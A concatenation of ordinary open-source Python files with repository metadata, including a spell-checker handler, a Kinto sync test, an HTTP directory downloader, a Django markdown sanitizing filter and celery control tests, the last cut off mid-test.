MMModelView(model.FileDetailFileGroup, SESSION, category='File'),
MMModelView(model.FileGroup, SESSION, category='File'),
MMModelView(model.Host, SESSION, category='Host'),
MMModelView(model.HostAclIp, SESSION, category='Host'),
MMModelView(model.HostCategory, SESSION, category='Host'),
MMModelView(model.HostCategoryDir, SESSION, category='Host'),
MMModelView(model.HostCategoryUrl, SESSION, category='Host'),
MMModelView(model.HostCountry, SESSION, category='Host'),
MMModelView(model.HostCountryAllowed, SESSION, category='Host'),
MMModelView(model.HostLocation, SESSION, category='Host'),
MMModelView(model.HostNetblock, SESSION, category='Host'),
MMModelView(model.HostPeerAsn, SESSION, category='Host'),
MMModelView(model.HostStats, SESSION, category='Host'),
MMModelView(model.Location, SESSION),
MMModelView(model.NetblockCountry, SESSION),
MMModelView(model.Product, SESSION),
MMModelView(model.Repository, SESSION, category='Repository'),
MMModelView(model.RepositoryRedirect, SESSION, category='Repository'),
MMModelView(model.Site, SESSION, category='Site'),
MMModelView(model.SiteAdmin, SESSION, category='Site'),
MMModelView(model.SiteToSite, SESSION, category='Site'),
MMModelView(model.Version, SESSION),
]
if APP.config.get('MM_AUTHENTICATION', None) == 'local':
VIEWS.append(MMModelView(model.User, SESSION))
VIEWS.append(MMModelView(model.Group, SESSION))
VIEWS.append(MMModelView(model.UserVisit, SESSION))
for view in VIEWS:
ADMIN.add_view(view)
| {
"content_hash": "9d2a8f0dc39b2fb3bdbd6df9a8ecfa32",
"timestamp": "",
"source": "github",
"line_count": 79,
"max_line_length": 79,
"avg_line_length": 39.54430379746835,
"alnum_prop": 0.7285531370038413,
"repo_name": "Devyani-Divs/mirrormanager2",
"id": "7068e1cbfb02b60dd717f781024fc2c48fab6874",
"size": "4109",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "mirrormanager2/admin.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "8488"
},
{
"name": "HTML",
"bytes": "545977"
},
{
"name": "Perl",
"bytes": "23467"
},
{
"name": "Python",
"bytes": "526386"
},
{
"name": "Shell",
"bytes": "6782"
}
],
"symlink_target": ""
} |
from UnitTest import UnitTest
# XXX fails with a JavaScript error: "In application LibTest -
# undefined: set is not defined
# pyjslib.py, line 1484
# pyjslib.py, line 206
# SetTest.py, line 5
# try:
# # try to use the built-in set type
# Set = set
# except NameError:
# # fall back to sets module
# from sets import Set
from sets import Set
class SetTest(UnitTest):
    """Unit tests for the Set container (pyjamas `sets` module)."""

    def testInit(self):
        """Membership works on a Set built from an initial iterable."""
        value = Set(['a', 'b', 'c'])
        self.assertTrue('b' in value)
        self.assertTrue('d' not in value)

    def testAdd(self):
        """Adding a duplicate element does not grow the set."""
        value = Set()
        value.add("a")
        value.add("b")
        value.add("a")
        self.assertTrue('a' in value)
        self.assertTrue('c' not in value)
        # BUG FIX: compare ints with ==, not 'is' — identity equality for
        # small ints is a CPython implementation detail, not a guarantee.
        self.assertTrue(len(value) == 2)

    def testRemove(self):
        """remove() deletes only the requested element."""
        value = Set(['a', 'b', 'c'])
        value.remove('a')
        self.assertTrue('a' not in value)
        self.assertTrue('b' in value)

    def testIter(self):
        """Iteration yields each stored element exactly once."""
        items = ['a', 'b', 'c']
        value = Set(items)
        for i in value:
            items.remove(i)
        # BUG FIX: == instead of 'is' (see testAdd).
        self.assertTrue(len(items) == 0)

    def testAddObject(self):
        """Distinct objects are distinct members even when equal-valued."""
        v1 = DummyClass('a')
        v2 = DummyClass('b')
        v3 = DummyClass('b')
        v4 = DummyClass('c')
        value = Set()
        value.add(v1)
        value.add(v2)
        value.add(v1)
        value.add(v3)
        self.assertTrue(v1 in value)
        self.assertTrue(v2 in value)
        self.assertTrue(v3 in value)
        self.assertTrue(v4 not in value)
        # BUG FIX: == instead of 'is' (see testAdd).
        self.assertTrue(len(value) == 3)
class DummyClass:
    """Minimal value holder used by the set tests to exercise sets of
    arbitrary (identity-hashed) objects."""

    def __init__(self, value):
        self.value = value

    def getValue(self):
        """Return the wrapped value."""
        return self.value
| {
"content_hash": "ab7a93a2a824678cfe8e663ca098aafa",
"timestamp": "",
"source": "github",
"line_count": 76,
"max_line_length": 62,
"avg_line_length": 22.32894736842105,
"alnum_prop": 0.5586328815556865,
"repo_name": "lovelysystems/pyjamas",
"id": "1964ab226ab0d6b63cd5681404d0d4cfb9df3c9a",
"size": "1697",
"binary": false,
"copies": "2",
"ref": "refs/heads/ls-production",
"path": "examples/libtest/SetTest.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "JavaScript",
"bytes": "271093"
},
{
"name": "PHP",
"bytes": "121841"
},
{
"name": "Python",
"bytes": "1958339"
},
{
"name": "Shell",
"bytes": "9117"
}
],
"symlink_target": ""
} |
"""Request handler of the module."""
import copy
import aspell
import re
from ppp_datamodel import Sentence, Resource
from ppp_datamodel.communication import TraceItem, Response
from ppp_libmodule.exceptions import ClientError
class Word:
    """A token extracted from a sentence, together with its position and
    correction state.

    Attributes (set in __init__):
        string      -- the word text (replaced by a suggestion when corrected)
        corrected   -- True once the spell checker substituted the word
        beginOffset -- index of the word's first character in the sentence
    """

    def __init__(self, string, beginOffset):
        self.string = string
        self.corrected = False
        self.beginOffset = beginOffset

    def __str__(self):
        return "({0},{1},{2})".format(str(self.string), str(self.corrected), str(self.beginOffset))

    def __eq__(self, other):
        # Fixed: the original unconditionally read other.__dict__ and so
        # raised AttributeError when compared with unrelated types (ints,
        # strings, ...).  Returning NotImplemented lets Python fall back
        # to its default comparison instead.
        if not isinstance(other, Word):
            return NotImplemented
        return self.__dict__ == other.__dict__

    def copy(self):
        """Return an independent deep copy of this word."""
        return copy.deepcopy(self)
class StringCorrector:
    """
    A class to perform spell checking.
    A new instance of the object has to be created for each string.
    """
    # Regex alternation matching one quoted span per quote style
    # (straight double quotes, curly doubles, curly singles, guillemets).
    # Text inside quotes is exempted from correction (see correct()).
    quotationRegexp = '|'.join(r'{0}(?:\.|[^{0}{1}\\])*{1}'.format(quote[0], quote[1])
                               for quote in ['""', '“”', '‘’', '«»']
                               )

    def __init__(self, language):
        # language: aspell language code, e.g. 'en' — passed straight to aspell.
        self.numberCorrections = 0  # how many words correct() replaced
        self.numberWords = 0        # how many words correctString() examined
        self.speller = aspell.Speller('lang', language)
        self.quotations = set()     # character offsets lying inside quoted spans

    def correct(self, w):
        """
        Take in input a word.
        Return the corrected word (unchanged if it was already correct).
        """
        # Words inside quotation marks are deliberately left untouched.
        if w.beginOffset in self.quotations:
            return w
        if self.speller.check(w.string):
            return w
        # Bare numbers are not spelling mistakes.
        if w.string.isdecimal():
            return w
        else:
            self.numberCorrections += 1
            # Take aspell's top suggestion.  NOTE(review): this raises
            # IndexError if aspell returns an empty suggestion list —
            # confirm that cannot happen for a word check() rejected.
            w.string = self.speller.suggest(w.string)[0]
            w.corrected = True
            return w

    def correctList(self, wordList):
        """
        Take in input a list of words.
        Return the list of correct words.
        """
        return [self.correct(w) for w in wordList]

    def tokenize(self, s):
        """
        Returns the list of the words in s.
        """
        wordList = re.findall(r"[\w']+", s)
        result = []
        wordId = 0
        for i in range(0, len(wordList)):
            # Find the word in the *remaining* suffix of s, then
            # accumulate offsets so beginOffset is absolute with respect
            # to the original string.  s is trimmed after each word so a
            # repeated word is located at its next occurrence.
            newId = s.index(wordList[i])
            wordId += newId
            result.append(Word(wordList[i], wordId))
            wordId += len(wordList[i])
            s=s[newId+len(wordList[i]):]
        return result

    def quotationTraversal(self, s):
        """
        Fill the quotation set.
        """
        # Record every character offset covered by a quoted span.
        for quote in re.finditer(self.quotationRegexp, s):
            self.quotations = self.quotations.union(range(quote.start(), quote.end()))

    def correctString(self, s):
        """
        Return the corrected string.
        """
        wordList = self.tokenize(s)
        self.numberWords = len(wordList)
        self.quotationTraversal(s)
        # Correct copies so the original word list keeps the original
        # lengths, which are needed to advance oldId below.
        correctedList = self.correctList([w.copy() for w in wordList])
        result = ""
        oldId = 0
        # Re-assemble: copy the inter-word text verbatim, splice in each
        # (possibly corrected) word at its original offset.
        for i in range(0, len(correctedList)):
            result += s[oldId:correctedList[i].beginOffset]
            result += correctedList[i].string
            oldId = correctedList[i].beginOffset+len(wordList[i].string)
        result += s[oldId:len(s)]
        return result
class RequestHandler:
    """Answer a PPP request by spell-checking its sentence.

    Produces a response only when at least one word was actually
    corrected; otherwise stays silent (returns no responses).
    """

    def __init__(self, request):
        self.request = request

    def answer(self):
        request = self.request
        # Only raw sentences can be spell-checked.
        if not isinstance(request.tree, Sentence):
            return []
        corrector = StringCorrector(request.language)
        correctedText = corrector.correctString(request.tree.value)
        if corrector.numberCorrections == 0:
            # Nothing was fixed: do not echo the input back.
            return []
        outputTree = Sentence(correctedText)
        # Boost relevance by the fraction of words that were corrected.
        relevance = request.measures.get('relevance', 0) \
            + corrector.numberCorrections/corrector.numberWords
        meas = {'accuracy': 0.5, 'relevance': relevance}
        trace = request.trace + [TraceItem('spell-checker', outputTree, meas)]
        response = Response(language=request.language, tree=outputTree,
                            measures=meas, trace=trace)
        return [response]
| {
"content_hash": "7a4a4a658d8de57131dd81281840ff66",
"timestamp": "",
"source": "github",
"line_count": 121,
"max_line_length": 113,
"avg_line_length": 32.90909090909091,
"alnum_prop": 0.5768458061275741,
"repo_name": "ProjetPP/PPP-Spell-Checker",
"id": "30e97ee914d518a1a9afea65a69c9329847bfc34",
"size": "3992",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "ppp_spell_checker/requesthandler.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "228"
},
{
"name": "Python",
"bytes": "11710"
},
{
"name": "Shell",
"bytes": "179"
}
],
"symlink_target": ""
} |
import mock
from xml2kinto.kinto import get_kinto_records
def test_get_kinto_records_try_to_create_the_bucket():
    """The bucket is created (if_not_exists) before records are read."""
    client = mock.MagicMock()
    client.create_collection.return_value.status_code = 201
    get_kinto_records(client, mock.sentinel.bucket,
                      mock.sentinel.collection, mock.sentinel.permissions)
    client.create_bucket.assert_called_with(
        mock.sentinel.bucket, if_not_exists=True)
def test_get_kinto_records_try_to_create_the_collection_with_permissions():
    """The collection is created with the caller-supplied permissions."""
    client = mock.MagicMock()
    client.create_collection.return_value.status_code = 201
    get_kinto_records(client, mock.sentinel.bucket,
                      mock.sentinel.collection, mock.sentinel.permissions)
    client.create_collection.assert_called_with(
        mock.sentinel.collection, mock.sentinel.bucket,
        permissions=mock.sentinel.permissions, if_not_exists=True)
def test_get_kinto_records_gets_a_list_of_records():
    """Records are fetched from the requested bucket and collection."""
    client = mock.MagicMock()
    client.create_collection.return_value.status_code = 201
    get_kinto_records(client, mock.sentinel.bucket,
                      mock.sentinel.collection, mock.sentinel.permissions)
    client.get_records.assert_called_with(
        bucket=mock.sentinel.bucket, collection=mock.sentinel.collection)
def test_get_kinto_records_try_to_create_the_collection_with_schema():
    """A freshly created collection (201) gets the schema patched in."""
    client = mock.MagicMock()
    client.create_collection.return_value.status_code = 201
    client.create_collection.return_value.json.return_value = {
        "data": {"schema": {}}
    }
    get_kinto_records(client,
                      mock.sentinel.bucket,
                      mock.sentinel.collection,
                      mock.sentinel.permissions,
                      schema={'foo': 'bar'})
    client.patch_collection.assert_called_with(
        bucket=mock.sentinel.bucket,
        collection=mock.sentinel.collection,
        data={"schema": {"foo": "bar"}})
def test_get_kinto_records_try_to_update_the_collection_schema():
    """An existing collection with an out-of-date schema gets patched."""
    client = mock.MagicMock()
    client.create_collection.return_value = {
        "details": {"existing": {"schema": {}}}
    }
    get_kinto_records(client,
                      mock.sentinel.bucket,
                      mock.sentinel.collection,
                      mock.sentinel.permissions,
                      schema={'foo': 'bar'})
    client.patch_collection.assert_called_with(
        bucket=mock.sentinel.bucket,
        collection=mock.sentinel.collection,
        data={"schema": {"foo": "bar"}})
def test_get_kinto_records_does_not_update_the_collection_schema_if_right():
    """No patch is issued when the stored schema already matches."""
    client = mock.MagicMock()
    client.create_collection.return_value = {
        "details": {"existing": {"schema": {"foo": "bar"}}}
    }
    get_kinto_records(client,
                      mock.sentinel.bucket,
                      mock.sentinel.collection,
                      mock.sentinel.permissions,
                      schema={'foo': 'bar'})
    assert not client.patch_collection.called
def test_get_kinto_records_does_update_if_it_has_created_it():
    """A collection we just created is always patched with the schema."""
    client = mock.MagicMock()
    client.create_collection.return_value = {
        "data": {"schema": {}}
    }
    get_kinto_records(client,
                      mock.sentinel.bucket,
                      mock.sentinel.collection,
                      mock.sentinel.permissions,
                      schema={'foo': 'bar'})
    assert client.patch_collection.called
| {
"content_hash": "b9c0d2874d15be038434b165127006ae",
"timestamp": "",
"source": "github",
"line_count": 108,
"max_line_length": 76,
"avg_line_length": 35.25925925925926,
"alnum_prop": 0.6016281512605042,
"repo_name": "mozilla-services/xml2kinto",
"id": "3539bdb94f4caa3d87b9396d0073f7bbc3ec7cee",
"size": "3808",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "xml2kinto/tests/test_kinto.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "19766"
},
{
"name": "Makefile",
"bytes": "2304"
},
{
"name": "Python",
"bytes": "47294"
}
],
"symlink_target": ""
} |
from __future__ import division
from HTMLParser import HTMLParser
import os
import re
from .https_if_available import build_opener
re_url = re.compile(r'^(([a-zA-Z_-]+)://([^/]+))(/.*)?$')
def resolve_link(link, url):
    """Resolve *link* against the page URL *url*; return an absolute URL.

    Handles three shapes: an already-absolute URL (a bare domain is
    normalized to end in '/'), a host-absolute path ('/a/b'), and a
    relative path ('a/b').
    """
    absolute = re_url.match(link)
    if absolute is not None:
        # http://domain -> http://domain/ ; anything with a path is kept.
        return link + '/' if not absolute.group(4) else link
    if link[0] == '/':
        # Host-absolute path: graft it onto scheme://host of *url*.
        return re_url.match(url).group(1) + link
    # Relative path: join with exactly one slash.
    return url + link if url[-1] == '/' else url + '/' + link
class ListingParser(HTMLParser):
    """Collect the target of every <a href=...> found in an HTML page.

    Links are resolved into absolute URLs against the base *url* and
    accumulated in the ``links`` set.
    """

    def __init__(self, url):
        HTMLParser.__init__(self)
        # Normalize the base URL so relative links resolve below it.
        if url[-1] != '/':
            url += '/'
        self.__url = url
        self.links = set()

    def handle_starttag(self, tag, attrs):
        if tag != 'a':
            return
        for name, value in attrs:
            if name != 'href':
                continue
            if not value:
                # Empty href: keep scanning for another href attribute.
                continue
            self.links.add(resolve_link(value, self.__url))
            break
def download_directory(url, target, insecure=False):
    """Recursively mirror *url* into the local path *target*.

    An HTML response is treated as a directory listing: every link that
    points below *url* is downloaded recursively into *target*.  Any
    other response is streamed to *target* as a regular file.
    (Python 2 code: relies on the mimetools-style response.info().type.)
    """
    def mkdir():
        # Create *target* lazily, only once we know we will write into it.
        if not mkdir.done:
            try:
                os.mkdir(target)
            except OSError:
                # Directory probably exists already; ignore.
                pass
            mkdir.done = True
    mkdir.done = False
    opener = build_opener(insecure=insecure)
    response = opener.open(url)
    if response.info().type == 'text/html':
        contents = response.read()
        parser = ListingParser(url)
        parser.feed(contents)
        for link in parser.links:
            link = resolve_link(link, url)
            # Strip a trailing slash so rsplit() below yields the name.
            if link[-1] == '/':
                link = link[:-1]
            # Only descend into links below the starting URL; this also
            # discards parent-directory links.
            if not link.startswith(url):
                continue
            name = link.rsplit('/', 1)[1]
            # Skip query links such as Apache's column-sort anchors (?C=N;O=D).
            if '?' in name:
                continue
            mkdir()
            download_directory(link, os.path.join(target, name), insecure)
        if not mkdir.done:
            # We didn't find anything to write inside this directory
            # Maybe it's a HTML file?
            if url[-1] != '/':
                end = target[-5:].lower()
                if not (end.endswith('.htm') or end.endswith('.html')):
                    target = target + '.html'
                with open(target, 'wb') as fp:
                    fp.write(contents)
    else:
        # Regular file: stream to disk in fixed-size chunks.
        buffer_size = 4096
        with open(target, 'wb') as fp:
            chunk = response.read(buffer_size)
            while chunk:
                fp.write(chunk)
                chunk = response.read(buffer_size)
###############################################################################
import unittest
class TestLinkResolution(unittest.TestCase):
    """Unit tests for resolve_link(), table-driven per link shape."""

    def test_absolute_link(self):
        for link, url, expected in [
            ('http://website.org/p/test.txt', 'http://some/other/url',
             'http://website.org/p/test.txt'),
            ('http://website.org', 'http://some/other/url',
             'http://website.org/'),
        ]:
            self.assertEqual(resolve_link(link, url), expected)

    def test_absolute_path(self):
        for link, url, expected in [
            ('/p/test.txt', 'http://some/url', 'http://some/p/test.txt'),
            ('/p/test.txt', 'http://some/url/', 'http://some/p/test.txt'),
            ('/p/test.txt', 'http://site', 'http://site/p/test.txt'),
            ('/p/test.txt', 'http://site/', 'http://site/p/test.txt'),
        ]:
            self.assertEqual(resolve_link(link, url), expected)

    def test_relative_path(self):
        for link, url, expected in [
            ('some/file', 'http://site/folder', 'http://site/folder/some/file'),
            ('some/file', 'http://site/folder/', 'http://site/folder/some/file'),
            ('some/dir/', 'http://site/folder', 'http://site/folder/some/dir/'),
        ]:
            self.assertEqual(resolve_link(link, url), expected)
class TestParser(unittest.TestCase):
    """Test ListingParser against a captured Apache mod_autoindex page."""

    def test_parse(self):
        parser = ListingParser('http://a.remram.fr/test')
        # Verbatim Apache directory-index markup; do not re-wrap.
        parser.feed("""
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"><html><head><title>
Index of /test</title></head><body><h1>Index of /test</h1><table><tr><th>
<img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a>
</th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size
</a></th><th><a href="?C=D;O=A">Description</a></th></tr><tr><th colspan="5">
<hr></th></tr><tr><td valign="top"><img src="/icons/back.gif" alt="[DIR]"></td>
<td><a href="/">Parent Directory</a></td><td>&nbsp;</td><td align="right">  - 
</td><td>&nbsp;</td></tr><tr><td valign="top">
<img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="a">a</a></td>
<td align="right">11-Sep-2013 15:46  </td><td align="right">  3 </td><td>
</td></tr><tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td>
<td><a href="/bb">bb</a></td><td align="right">11-Sep-2013 15:46  </td>
<td align="right">  3 </td><td>&nbsp;</td></tr><tr><td valign="top">
<img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="/cc/">cc/</a></td>
<td align="right">11-Sep-2013 15:46  </td><td align="right">  - </td><td>
</td></tr><tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td>
<td><a href="http://a.remram.fr/dd">dd/</a></td><td align="right">
11-Sep-2013 15:46  </td><td align="right">  - </td><td>&nbsp;</td></tr><tr>
<th colspan="5"><hr></th></tr></table></body></html>
""")
        # Drop Apache's column-sorting anchors (?C=...) before comparing.
        links = set(l for l in parser.links if '?' not in l)
        self.assertEqual(links, set([
            'http://a.remram.fr/',
            'http://a.remram.fr/test/a',
            'http://a.remram.fr/bb',
            'http://a.remram.fr/cc/',
            'http://a.remram.fr/dd',
        ]))
| {
"content_hash": "c22d8089d1ef3aa72dfca60fe1f4ba57",
"timestamp": "",
"source": "github",
"line_count": 177,
"max_line_length": 79,
"avg_line_length": 35.559322033898304,
"alnum_prop": 0.4974578964092787,
"repo_name": "VisTrails/VisTrails",
"id": "18b8d50899749d349fe8cba314739d62a49fcaa8",
"size": "8252",
"binary": false,
"copies": "2",
"ref": "refs/heads/v2.2",
"path": "vistrails/packages/URL/http_directory.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "1129"
},
{
"name": "Makefile",
"bytes": "768"
},
{
"name": "Mako",
"bytes": "66613"
},
{
"name": "PHP",
"bytes": "49302"
},
{
"name": "Python",
"bytes": "19779006"
},
{
"name": "R",
"bytes": "782836"
},
{
"name": "Ruby",
"bytes": "875"
},
{
"name": "SQLPL",
"bytes": "2323"
},
{
"name": "Shell",
"bytes": "26542"
},
{
"name": "TeX",
"bytes": "147247"
},
{
"name": "XSLT",
"bytes": "1090"
}
],
"symlink_target": ""
} |
from .baselines import (
mean_on_fold,
random_on_fold,
xu_et_al_on_fold,
doench_on_fold,
sgrna_from_doench_on_fold,
SVC_on_fold,
)
from .ensembles import (
spearman_scoring,
adaboost_on_fold,
LASSOs_ensemble_on_fold,
randomforest_on_fold,
decisiontree_on_fold,
linear_stacking,
pairwise_majority_voting,
median,
GBR_stacking,
GP_stacking,
SVM_stacking,
)
from .regression import (
ARDRegression_on_fold,
train_linreg_model,
logreg_on_fold,
linreg_on_fold,
feature_select,
get_weights,
set_up_inner_folds,
)
from .ssk import weighted_degree_kxx, WD_K
| {
"content_hash": "119945889c5639f3ae071ebc64cc5554",
"timestamp": "",
"source": "github",
"line_count": 31,
"max_line_length": 42,
"avg_line_length": 20.838709677419356,
"alnum_prop": 0.6547987616099071,
"repo_name": "pablocarderam/genetargeter",
"id": "61309e002081f50c544ecb8af0571db799f50edd",
"size": "706",
"binary": false,
"copies": "1",
"ref": "refs/heads/python3",
"path": "gRNAScores/azimuth/models/__init__.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "C++",
"bytes": "16396"
},
{
"name": "CSS",
"bytes": "7323"
},
{
"name": "HTML",
"bytes": "27988"
},
{
"name": "JavaScript",
"bytes": "412639"
},
{
"name": "Procfile",
"bytes": "21"
},
{
"name": "Python",
"bytes": "551082"
}
],
"symlink_target": ""
} |
"""Markdown template filter."""
from django import template
from django.utils.safestring import mark_safe
import bleach
import markdown as markdown_
# Template-tag registry this module's filters attach to.
register = template.Library()

# Tags allowed through bleach in addition to bleach.ALLOWED_TAGS.
ADDITIONAL_TAGS = ['p', 'br', 'pre']
@register.filter(name='markdown')
def markdown_filter(value):
    """Convert markdown value to sanitized HTML.

    A value containing more than five '<' characters is assumed to be
    HTML already and is passed straight to the sanitizer; everything
    else is rendered with markdown first.
    """
    looks_like_html = value.count('<') > 5
    rendered_html = value if looks_like_html else markdown_.markdown(value)
    bleached_html = bleach.clean(
        rendered_html, tags=bleach.ALLOWED_TAGS + ADDITIONAL_TAGS, strip=True)
    return mark_safe(bleached_html)
| {
"content_hash": "7eaef0b62295b3f13d3b1142b226cf21",
"timestamp": "",
"source": "github",
"line_count": 23,
"max_line_length": 103,
"avg_line_length": 27.47826086956522,
"alnum_prop": 0.6962025316455697,
"repo_name": "ScorpionResponse/freelancefinder",
"id": "ba4c9d13ffb60d6f4008af55d655da1f2046cd57",
"size": "632",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "freelancefinder/freelancefinder/templatetags/markdown_filter.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "78142"
},
{
"name": "HTML",
"bytes": "64094"
},
{
"name": "JavaScript",
"bytes": "15641"
},
{
"name": "Makefile",
"bytes": "2402"
},
{
"name": "Python",
"bytes": "366512"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import, unicode_literals
import pytest
from case import Mock
from celery import uuid
from celery.app import control
from celery.exceptions import DuplicateNodenameWarning
from celery.five import items
from celery.utils.collections import LimitedSet
def _info_for_commandclass(type_):
    """Return (name, info) pairs from the worker Panel registry whose
    declared type equals *type_* ('control' or 'inspect')."""
    from celery.worker.control import Panel
    return [(cmd, meta) for cmd, meta in items(Panel.meta)
            if meta.type == type_]
def test_client_implements_all_commands(app):
    """app.control must expose a method for every 'control' command."""
    found = _info_for_commandclass('control')
    assert found
    for name, _meta in found:
        assert getattr(app.control, name)
def test_inspect_implements_all_commands(app):
    """The Inspect proxy must expose every 'inspect' command."""
    inspect = app.control.inspect()
    found = _info_for_commandclass('inspect')
    assert found
    for name, meta in found:
        if meta.type == 'inspect':
            assert getattr(inspect, name)
class test_flatten_reply:

    def test_flatten_reply(self):
        """Duplicate node names in a reply list trigger a warning but are
        still merged into one mapping keyed by node name."""
        reply = [
            {'foo@example.com': {'hello': 10}},
            {'foo@example.com': {'hello': 20}},
            {'bar@example.com': {'hello': 30}}
        ]
        with pytest.warns(DuplicateNodenameWarning) as warned:
            nodes = control.flatten_reply(reply)
        expected = 'Received multiple replies from node name: {0}.'.format(
            next(iter(reply[0])))
        assert expected in str(warned[0].message.args[0])
        assert 'foo@example.com' in nodes
        assert 'bar@example.com' in nodes
class test_inspect:
    """Verify each Inspect method broadcasts its command with the
    expected arguments (broadcast itself is mocked out)."""

    def setup(self):
        # Replace the real broadcast so no broker connection is needed.
        self.app.control.broadcast = Mock(name='broadcast')
        self.app.control.broadcast.return_value = {}
        self.inspect = self.app.control.inspect()

    def test_prepare_reply(self):
        # With no destination, per-node replies merge into one mapping.
        reply = self.inspect._prepare([
            {'w1': {'ok': 1}},
            {'w2': {'ok': 1}},
        ])
        assert reply == {
            'w1': {'ok': 1},
            'w2': {'ok': 1},
        }
        # With a single destination the node wrapper is unwrapped.
        i = self.app.control.inspect(destination='w1')
        assert i._prepare([{'w1': {'ok': 1}}]) == {'ok': 1}

    def assert_broadcast_called(self, command,
                                destination=None,
                                callback=None,
                                connection=None,
                                limit=None,
                                timeout=None,
                                reply=True,
                                **arguments):
        # Helper: the mocked broadcast must have been called with
        # *command*; unset options default to this inspect instance's own.
        self.app.control.broadcast.assert_called_with(
            command,
            arguments=arguments,
            destination=destination or self.inspect.destination,
            callback=callback or self.inspect.callback,
            connection=connection or self.inspect.connection,
            limit=limit if limit is not None else self.inspect.limit,
            timeout=timeout if timeout is not None else self.inspect.timeout,
            reply=reply,
        )

    def test_active(self):
        self.inspect.active()
        self.assert_broadcast_called('active')

    def test_clock(self):
        self.inspect.clock()
        self.assert_broadcast_called('clock')

    def test_conf(self):
        self.inspect.conf()
        self.assert_broadcast_called('conf', with_defaults=False)

    def test_conf__with_defaults(self):
        self.inspect.conf(with_defaults=True)
        self.assert_broadcast_called('conf', with_defaults=True)

    def test_hello(self):
        self.inspect.hello('george@vandelay.com')
        self.assert_broadcast_called(
            'hello', from_node='george@vandelay.com', revoked=None)

    def test_hello__with_revoked(self):
        revoked = LimitedSet(100)
        for i in range(100):
            revoked.add('id{0}'.format(i))
        self.inspect.hello('george@vandelay.com', revoked=revoked._data)
        self.assert_broadcast_called(
            'hello', from_node='george@vandelay.com', revoked=revoked._data)

    def test_memsample(self):
        self.inspect.memsample()
        self.assert_broadcast_called('memsample')

    def test_memdump(self):
        self.inspect.memdump()
        self.assert_broadcast_called('memdump', samples=10)

    def test_memdump__samples_specified(self):
        self.inspect.memdump(samples=303)
        self.assert_broadcast_called('memdump', samples=303)

    def test_objgraph(self):
        self.inspect.objgraph()
        self.assert_broadcast_called(
            'objgraph', num=200, type='Request', max_depth=10)

    def test_scheduled(self):
        self.inspect.scheduled()
        self.assert_broadcast_called('scheduled')

    def test_reserved(self):
        self.inspect.reserved()
        self.assert_broadcast_called('reserved')

    def test_stats(self):
        self.inspect.stats()
        self.assert_broadcast_called('stats')

    def test_revoked(self):
        self.inspect.revoked()
        self.assert_broadcast_called('revoked')

    def test_registered(self):
        self.inspect.registered()
        self.assert_broadcast_called('registered', taskinfoitems=())

    def test_registered__taskinfoitems(self):
        self.inspect.registered('rate_limit', 'time_limit')
        self.assert_broadcast_called(
            'registered',
            taskinfoitems=('rate_limit', 'time_limit'),
        )

    def test_ping(self):
        self.inspect.ping()
        self.assert_broadcast_called('ping')

    def test_active_queues(self):
        self.inspect.active_queues()
        self.assert_broadcast_called('active_queues')

    def test_query_task(self):
        self.inspect.query_task('foo', 'bar')
        self.assert_broadcast_called('query_task', ids=('foo', 'bar'))

    def test_query_task__compat_single_list_argument(self):
        # Passing one list (legacy call style) keeps the list as-is.
        self.inspect.query_task(['foo', 'bar'])
        self.assert_broadcast_called('query_task', ids=['foo', 'bar'])

    def test_query_task__scalar(self):
        self.inspect.query_task('foo')
        self.assert_broadcast_called('query_task', ids=('foo',))

    def test_report(self):
        self.inspect.report()
        self.assert_broadcast_called('report')
class test_Control_broadcast:
    """Tests for Control.broadcast()'s interaction with the mailbox."""

    def setup(self):
        self.app.control.mailbox = Mock(name='mailbox')

    def test_broadcast(self):
        self.app.control.broadcast('foobarbaz', arguments={'foo': 2})
        self.app.control.mailbox.assert_called()
        # Positional args appear to be: command, arguments, destination,
        # reply, timeout, limit, callback, plus the channel kwarg.
        # NOTE(review): ordering inferred from the expected call —
        # confirm against kombu.pidbox.Mailbox._broadcast.
        self.app.control.mailbox()._broadcast.assert_called_with(
            'foobarbaz', {'foo': 2}, None, False, 1.0, None, None,
            channel=None,
        )

    def test_broadcast_limit(self):
        # arguments=None must be normalized to {} before the broadcast.
        self.app.control.broadcast(
            'foobarbaz1', arguments=None, limit=None, destination=[1, 2, 3],
        )
        self.app.control.mailbox.assert_called()
        self.app.control.mailbox()._broadcast.assert_called_with(
            'foobarbaz1', {}, [1, 2, 3], False, 1.0, None, None,
            channel=None,
        )
class test_Control:
    """Verify each Control method broadcasts the expected command name,
    arguments, destination, and pass-through options."""

    def setup(self):
        # Mock out broadcast so no broker is required; register a dummy
        # task whose name the rate/time-limit tests can reference.
        self.app.control.broadcast = Mock(name='broadcast')
        self.app.control.broadcast.return_value = {}

        @self.app.task(shared=False)
        def mytask():
            pass
        self.mytask = mytask

    def assert_control_called_with_args(self, name, destination=None,
                                        _options=None, **args):
        # Helper: keyword args become the broadcast `arguments` dict;
        # _options are forwarded as extra broadcast keyword options.
        self.app.control.broadcast.assert_called_with(
            name, destination=destination, arguments=args, **_options or {})

    def test_purge(self):
        self.app.amqp.TaskConsumer = Mock(name='TaskConsumer')
        self.app.control.purge()
        self.app.amqp.TaskConsumer().purge.assert_called_with()

    def test_rate_limit(self):
        self.app.control.rate_limit(self.mytask.name, '100/m')
        self.assert_control_called_with_args(
            'rate_limit',
            destination=None,
            task_name=self.mytask.name,
            rate_limit='100/m',
        )

    def test_rate_limit__with_destination(self):
        self.app.control.rate_limit(
